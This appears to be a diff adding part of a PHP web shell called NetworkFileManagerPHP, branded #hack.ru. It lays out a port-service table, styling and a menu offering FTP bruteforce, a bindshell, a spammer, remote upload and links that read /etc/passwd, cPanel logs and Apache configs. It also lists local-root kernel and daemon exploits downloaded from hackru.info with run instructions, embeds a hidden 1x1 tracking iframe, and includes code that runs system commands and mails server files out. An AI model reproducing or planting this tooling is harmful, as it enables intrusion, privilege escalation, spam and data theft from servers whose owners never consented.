+$port[7649] = "CU-SeeMe";
+
+$port[8000] = "iRDMI/Shoutcast Server";
+
+$port[8010] = "WinGate 2.1";
+
+$port[8080] = "HTTP";
+
+$port[8181] = "HTTP";
+
+$port[8383] = "IMail WWW";
+
+$port[8875] = "napster";
+
+$port[8888] = "napster";
+
+$port[8889] = "Desktop Data TCP 1";
+
+$port[8890] = "Desktop Data TCP 2";
+
+$port[8891] = "Desktop Data TCP 3: NESS application";
+
+$port[8892] = "Desktop Data TCP 4: FARM product";
+
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+
+$port[8894] = "Desktop Data TCP 6: COAL application";
+
+$port[9000] = "CSlistener";
+
+$port[10008] = "cheese worm";
+
+$port[11371] = "PGP 5 Keyserver";
+
+$port[13223] = "PowWow";
+
+$port[13224] = "PowWow";
+
+$port[14237] = "Palm";
+
+$port[14238] = "Palm";
+
+$port[18888] = "LiquidAudio";
+
+$port[21157] = "Activision";
+
+$port[22555] = "Vocaltec Web Conference";
+
+$port[23213] = "PowWow";
+
+$port[23214] = "PowWow";
+
+$port[23456] = "EvilFTP";
+
+$port[26000] = "Quake";
+
+$port[27001] = "QuakeWorld";
+
+$port[27010] = "Half-Life";
+
+$port[27015] = "Half-Life";
+
+$port[27960] = "QuakeIII";
+
+$port[30029] = "AOL Admin";
+
+$port[31337] = "Back Orifice";
+
+$port[32777] = "rpc.walld";
+
+$port[45000] = "Cisco NetRanger postofficed";
+
+$port[32773] = "rpc bserverd";
+
+$port[32776] = "rpc.spray";
+
+$port[32779] = "rpc.cmsd";
+
+$port[38036] = "timestep";
+
+$port[40193] = "Novell";
+
+$port[41524] = "arcserve discovery";
+
+
+
+/* finished config, here goes the design */
+
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+
+$style=<<<style
+
+<style>
+
+a.   {
+
+color: #ffffcc;
+
+text-decoration:none;
+
+font-family: Times New Roman;
+
+font-weight: bold;
+
+     }
+
+a.menu:hover   {
+
+color: #FF0000;
+
+font-family: Times New Roman;
+
+text-decoration: none
+
+font-weight: bold;
+
+          }
+
+a   {
+
+color: #000000;
+
+text-decoration:none;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+     }
+
+a:hover   {
+
+color: #184984;
+
+font-family: Tahoma;
+
+text-decoration: underline
+
+font-size: 11px;
+
+          }
+
+td.up{
+
+color: #996600;
+
+font-family: Verdana;
+
+font-weight: normal;
+
+font-size: 11px;
+
+}
+
+.pagetitle {
+
+font-family: Arial, Helvetica, sans-serif;
+
+color: #FFFFFF;
+
+text-decoration: none;
+
+font-size: 12px
+
+}
+
+.alert   {
+
+color: #FF0000;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+          }
+
+.button1 {
+
+font-size:11px;
+
+font-weight:bold;
+
+font-family:Verdana;
+
+background:#184984;
+
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+
+}
+
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+
+b {  font-weight: bold}
+
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+
+</style>
+
+style;
+
+
+
+/* table styles */
+
+$style1=<<<table
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table;
+
+$style2=<<<table_file
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table_file;
+
+$style3=<<<table_dir
+
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+
+table_dir;
+
+$style4=<<<table_files
+
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+
+table_files;
+
+$style_button=<<<button
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+button;
+
+$style_open=<<<open
+
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+
+open;
+
+$style_close=<<<close
+
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+
+close;
+
+$ins=<<<ins
+
+<script>
+
+function ins(text){
+
+document.hackru.chars_de.value+=text;
+
+document.hackru.chars_de.focus();
+
+}
+
+</script>
+
+ins;
+
+
+
+/* send form */
+
+$form = "
+
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr>
+
+  <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td>
+
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+
+     <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td>
+
+  </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Your name:</b></td>
+
+      <td width='250' class=pagetitle>
+
+        <input type='text' name='name' size='40' class='inputbox'></td>
+
+      </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Email:</b></td>
+
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+
+    </tr>
+
+
+
+  <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>
+
+  Your questions and wishes:
+
+  </b></font></b></td>
+
+  </tr>
+
+  <tr>
+
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+
+  <tr>
+
+  <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td>
+
+      <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td>
+
+      </tr>
+
+</form></table><br>
+
+";
+
+
+
+
+
+
+
+/* HTML Form */
+
+$HTML=<<<html
+
+<html>
+
+<head>
+
+<title>$title $ver</title>
+
+$meta
+
+$style
+
+$ins
+
+</head>
+
+
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Version: <b>$ver</b> </td></tr>
+
+<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Script help:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP bruteforce</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td>
+
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+
+</tr>
+
+<tr>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td>
+
+
+
+</tr>
+
+<!-- add by revers -->
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<!-- end add by revers -->
+
+</table>
+
+html;
+
+$key="goatse";
+
+$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>";
+
+/* randomizing letters array for random filenames of compression folders */
+
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+
+
+/* set full path to host and dir where public exploits and soft are situated */
+
+$public_site = "http://hackru.info/adm/exploits/public_exploits/";
+
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+
+/* Public exploits and soft */
+
+$public[1] = "s"; // bindshell
+
+$title_ex[1] = "
+
+&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br>
+
+<dd><b>Run:</b> ./s<br>
+
+&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u>
+
+";
+
+$public[2] = "m"; // mremap
+
+$title_ex[2] = "
+
+&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br>
+
+<dd><b>Run:</b> ./m<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[3] = "p"; // ptrace
+
+$title_ex[3] = "
+
+&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br>
+
+<dd><b>Run:</b> ./p<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
+
+$title_ex[4] = "
+
+&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br>
+
+<dd><b>Decompression:</b> tar -zxf psyBNC2.3.2-4.tar.gz // will be folder <u>psybnc</u><br>
+
+<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br>
+
+&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall!
+
+";
+
+/* Private exploits */
+
+$private[1] = "brk"; // localroot root linux 2.4.*
+
+$title_exp[1] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br>
+
+<dd><b>Run:</b> ./brk<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+
+$title_exp[2] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br>
+
+glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[3] = "glftpd";
+
+$title_exp[3] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+part 2<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[4] = "sortrace";
+
+$title_exp[4] = "
+
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br>
+
+<dd><b>Run:</b> ./sortrace<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[5] = "root";
+
+$title_exp[5] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br>
+
+<dd><b>Run:</b> ./root<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[6] = "sxp";
+
+$title_exp[6] = "
+
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br>
+
+<dd><b>Run:</b> ./sxp<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[7] = "ptrace_kmod";
+
+$title_exp[7] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br>
+
+<dd><b>Run:</b> ./ptrace_kmod<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[8] = "mr1_a";
+
+$title_exp[8] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br>
+
+<dd><b>Run:</b> ./mr1_a<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+/* set full path to host and dir where private exploits and soft are situated */
+
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+
+endif;
+
+
+
+$createdir= "files";
+
+
+
+/* spamer config */
+
+
+
+$sendemail = "packetstorm@km.ru";
+
+$confirmationemail = "packetstorm@km.ru";
+
+$mailsubject = "Hello!This is a test message!";
+
+
+
+
+
+
+
+/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING	 */
+
+global $action,$tm,$cm;
+
+
+
+function getdir() {
+
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+
+ $st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+ $free = tinhbyte(diskfreespace("./"));
+
+ print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>");
+
+ print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>");
+
+
+}
+
+function tinhbyte($filesize) {
+
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+
+ else { $filesize = $filesize . ""; }
+
+ return $filesize;
+
+}
+
+
+
+function permissions($mode) {
+
+ $perms  = ($mode & 00400) ? "r" : "-";
+
+ $perms .= ($mode & 00200) ? "w" : "-";
+
+ $perms .= ($mode & 00100) ? "x" : "-";
+
+ $perms .= ($mode & 00040) ? "r" : "-";
+
+ $perms .= ($mode & 00020) ? "w" : "-";
+
+ $perms .= ($mode & 00010) ? "x" : "-";
+
+ $perms .= ($mode & 00004) ? "r" : "-";
+
+ $perms .= ($mode & 00002) ? "w" : "-";
+
+ $perms .= ($mode & 00001) ? "x" : "-";
+
+ return $perms;
+
+}
+
+
+
+function readdirdata($dir) {
+
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+
+ $files = array();
+
+ $dirs= array();
+
+ $open = @opendir($dir);
+
+
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>";
+
+ else {
+
+  $open = opendir($dir);
+
+  while ($file = readdir($open)) {
+
+   $rec = $file;
+
+   $file = $dir."/".$file;
+
+   if (is_file($file)) $files[] = $rec;
+
+  }
+
+  sort($files);
+
+  $open = opendir($dir);
+
+  $i=0;
+
+  while ($dire = readdir($open)) {
+
+   if ( $dire != "." ) {
+
+    $rec = $dire;
+
+    $dire = $dir."/".$dire;
+
+    if (is_dir($dire)) {
+
+     $dirs[] = $rec;
+
+     $i++;
+
+    }
+
+   }
+
+  }
+
+  sort($dirs);
+
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>");
+
+  for ($i=0;$i<sizeof($dirs);$i++) {
+
+   if ($dirs[$i] != "..") {
+
+    $type = 'Dir';
+
+    $fullpath = $dir."/".$dirs[$i];
+
+    $time = date("d/m/y H:i",filemtime($fullpath));
+
+    $perm = permissions(fileperms($fullpath));
+
+    $size = tinhbyte(filesize($fullpath));
+
+    $name = $dirs[$i];
+
+    $fullpath = $tm."/".$dirs[$i];
+
+    if ($perm[7] == "w" && $name != "..") $action = "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td>
+
+	</tr>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td>
+
+	</tr></table>";
+
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>";
+
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+
+   }
+
+  }
+
+  for ($i=0;$i<sizeof($files);$i++) {
+
+   $type = 'File';
+
+   $fullpath =  $dir."/".$files[$i];
+
+   $time = date("d/m/y H:i",filemtime($fullpath));
+
+   $perm = permissions(fileperms($fullpath));
+
+   $size = tinhbyte(filesize($fullpath));
+
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td>
+
+   </tr></table>";
+
+   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td>
+
+   </tr></table>";
+
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+
+  }
+
+ }
+
+}
+
+
+
+function html() {
+
+global $ver,$meta,$style;
+
+echo "
+
+<html>
+
+<head>
+
+<title>NetworkFileManagerPHP</title>
+
+</head>
+
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+";
+
+}
+
+
+
+# file view
+
+function viewfile($dir,$file) {
+
+
+
+ $buf = explode(".", $file);
+
+ $ext = $buf[sizeof($buf)-1];
+
+ $ext = strtolower($ext);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+
+
+ switch ($ext) {
+
+  case "jpg":
+
+
+
+	header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "jpeg":
+
+
+
+    header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "gif":
+
+
+
+    header("Content-type: image/gif");
+
+    readfile($fullpath);
+
+    break;
+
+
+
+	 case "png":
+
+
+
+    header("Content-type: image/png");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "avi":
+
+    header("Content-type: video/avi");
+
+    readfile($fullpath);
+
+
+
+    break;
+
+    default:
+
+
+
+	 case "mpeg":
+
+    header("Content-type: video/mpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "mpg":
+
+    header("Content-type: video/mpg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+    html();
+
+	chdir($dir);
+
+    getdir();
+
+
+
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+
+   $fp = fopen($fullpath , "r");
+
+   while (!feof($fp)) {
+
+    $char = fgetc($fp);
+
+    $st .= $char;
+
+   }
+
+
+
+   $st = str_replace("&", "&amp;", $st);
+
+   $st = str_replace("<", "&lt;", $st);
+
+   $st = str_replace(">", "&gt;", $st);
+
+
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+
+   echo $tem;
+
+   fclose($fp);
+
+   break;
+
+ }
+
+}
+
+
+
+# send file to mail
+
+function download_mail($dir,$file) {
+
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+
+ $buf = explode(".", $file);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+ $size = tinhbyte(filesize($fullpath));
+
+ $fp = fopen($fullpath, "rb");
+
+ while(!feof($fp))
+
+
+
+  $attachment .= fread($fp, 4096);
+
+  $attachment = base64_encode($attachment);
+
+  $subject = "NetworkFileManagerPHP  ($file)";
+
+
+
+  $boundary = uniqid("NextPart_");
+
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+
+
+  $info = "---==== Message from ($demail)====---\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+
+
+  $send_to = "$demail";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+
+
+  if($send == 2)
+
+   echo "<br>
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr><td align=center>
+
+	<font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>";
+
+
+
+fclose($fp);
+
+ }
+
+
+
+
+
+
+
+function copyfile($dir,$file) {
+
+ global $action,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+
+ if (!copy($file, $file.'.bak')){
+
+   echo (" unable to copy file $file");
+
+   }
+
+}
+
+
+
+
+
+# file edit
+
+function editfile($dir,$file) {
+
+ global $action,$datar;
+
+ $fullpath = $dir."/".$file;
+
+ chdir($dir);
+
+ getdir();
+
